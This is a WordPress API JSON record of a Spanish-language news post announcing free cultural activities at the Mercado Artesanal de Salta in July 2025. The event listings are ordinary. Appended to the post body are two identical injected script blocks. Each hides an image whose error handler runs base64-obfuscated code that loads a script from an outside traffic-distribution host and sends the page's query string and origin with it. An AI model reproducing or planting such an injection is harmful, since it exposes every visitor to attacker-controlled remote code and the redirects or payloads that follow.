{"id":5322,"date":"2025-07-11T07:50:47","date_gmt":"2025-07-11T10:50:47","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5322"},"modified":"2025-08-13T23:27:08","modified_gmt":"2025-08-14T02:27:08","slug":"vacaciones-en-cultura-el-mercado-artesanal-de-salta-te-espera-con-una-variada-agenda-de-actividades-gratuitas","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5322","title":{"rendered":"Vacaciones en Cultura: El Mercado Artesanal de Salta te espera con una variada agenda de actividades gratuitas"},"content":{"rendered":"\n<p><strong><em>Hasta el 27 de julio, salte\u00f1os y turistas podr\u00e1n disfrutar de feria, talleres, muestra, convite de mate y panificados caseros, celebraci\u00f3n del aniversario de la instituci\u00f3n, entre otras.<\/em><\/strong><\/p>\n\n\n\n<p>En el marco del ciclo Vacaciones en Cultura, impulsado por la Secretar\u00eda de Cultura, el Mercado Artesanal de Salta invita a participar de una amplia variedad de actividades gratuitas.<\/p>\n\n\n\n<p>Las mismas se desarrollar\u00e1n en los diferentes espacios del Mercado Artesanal de Salta, Av. San Mart\u00edn 2555.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18310-foto-ilustrativa.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18310-foto-ilustrativa.webp\" alt=\"Foto ilustrativa\"\/><\/a><\/figure>\n\n\n\n<p><strong>Del 10 al 27 de julio<\/strong><\/p>\n\n\n\n<p>El Mercado Artesanal de Salta junto a las diferentes Asociaciones de Artesanos recibir\u00e1n a los visitantes de 10 a 12 y de 16 a 18 horas con convite de mate cocido con yuyitos y panificados caseros, previo al recorrido por los salones de venta de artesan\u00edas aut\u00e9nticas y gastronom\u00eda regional<\/p>\n\n\n\n<p><strong>S\u00e1bado 12 de julio<\/strong><\/p>\n\n\n\n<p>11 horas: Misa en honor a la Virgen del Carmen y Virgen del Valle<\/p>\n\n\n\n<p><strong>Del 11 al 20 de julio<\/strong><\/p>\n\n\n\n<p>10 a 20:30 horas: Muestra de Artes Visuales \u201cEl lenguaje de las flores\u201d<\/p>\n\n\n\n<p>Artistas: Vargas &#8211; Martell<\/p>\n\n\n\n<p><strong>14 y 21 de julio<\/strong><\/p>\n\n\n\n<p>14 a 16 horas: Taller gratuito de Sublimaci\u00f3n Artesanal<\/p>\n\n\n\n<p>Destinado a j\u00f3venes de entre 15 a 20 a\u00f1os<\/p>\n\n\n\n<p>Cupos limitados. Incluye materiales: Inscripciones al 3874 828 55 o 3875 265 810<\/p>\n\n\n\n<p>Profesoras: Noel Ab\u00e1n y Sandra Martinez<\/p>\n\n\n\n<p><strong>Martes 15 de julio<\/strong><\/p>\n\n\n\n<p>10 a 15 horas: Aniversario 57\u00ba del Mercado Artesanal de Salta<\/p>\n\n\n\n<p>Demostraci\u00f3n del proceso artesanal, degustaci\u00f3n de productos regionales, m\u00fasica y danzas en vivo<\/p>\n\n\n\n<p><strong>Mi\u00e9rcoles 16 y mi\u00e9rcoles 23 de julio<\/strong><\/p>\n\n\n\n<p>17 horas: Clase abierta de yoga<\/p>\n\n\n\n<p>Cupos limitados: Inscripciones al 3876 323 415<\/p>\n\n\n\n<p>Facilita: Mar\u00eda Constanza Ruiz Huidobro<\/p>\n\n\n\n<p><strong>Martes 15 y 22, y jueves 17 y 24 de julio<\/strong><\/p>\n\n\n\n<p>Taller emocionarte: Teatro, canto, arte, juego, educaci\u00f3n emocional y literatura infantil<\/p>\n\n\n\n<p>15 a 16:30 horas: De 3 a 6 a\u00f1os<\/p>\n\n\n\n<p>16:30 a 18 horas: De 7 a\u00f1os en adelante<\/p>\n\n\n\n<p>Arancelado. Cupos limitados: Inscripciones al 3876 323 415<\/p>\n\n\n\n<p>Profesora: Mar\u00eda Constanza Ruiz Huidobro<\/p>\n\n\n\n<p><strong>21 de julio<\/strong><\/p>\n\n\n\n<p>11 a 14 horas: 12\u00ba Encuentro Nacional de Hermandad Chivera Argentina Filial Salta<\/p>\n\n\n\n<p><strong>Del 24 al 27 de julio<\/strong><\/p>\n\n\n\n<p>10 a 19 horas: Feria de Invierno con Artesanos de Pueblos Originarios<\/p>\n\n\n\n<p><strong>S\u00e1bado 26 de julio<\/strong><\/p>\n\n\n\n<p>15 a 18 horas: Primer Concurso Provincial del Bollo con y sin chicharr\u00f3n. Venta y degustaci\u00f3n de panificados e infusiones<\/p>\n\n\n\n<p>15 horas: Actuaci\u00f3n de Comparsas<\/p>\n\n\n\n<p>Las actividades se anunciaron en rueda de medio con la presencia de la directora del Mercado Artesanal de Salta, Yanina Lenti y el jefe de programa de Desarrollo Artesanal de la Provincia, Mario Luna, el cacique de la comparsa Los Inkas del Tawantinsuyo, Ram\u00f3n Vera y talleristas.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hasta el 27 de julio, salte\u00f1os y turistas podr\u00e1n disfrutar de feria, talleres, muestra, convite de mate y panificados caseros, celebraci\u00f3n del aniversario de la instituci\u00f3n, entre otras. En el marco del ciclo Vacaciones en Cultura, impulsado por la Secretar\u00eda de Cultura, el Mercado Artesanal de Salta invita a participar de una amplia variedad de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5323,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,15],"tags":[],"class_list":{"0":"post-5322","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5322"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5322"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5322\/revisions"}],"predecessor-version":[{"id":6443,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5322\/revisions\/6443"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5323"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5322"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5322"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5322"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}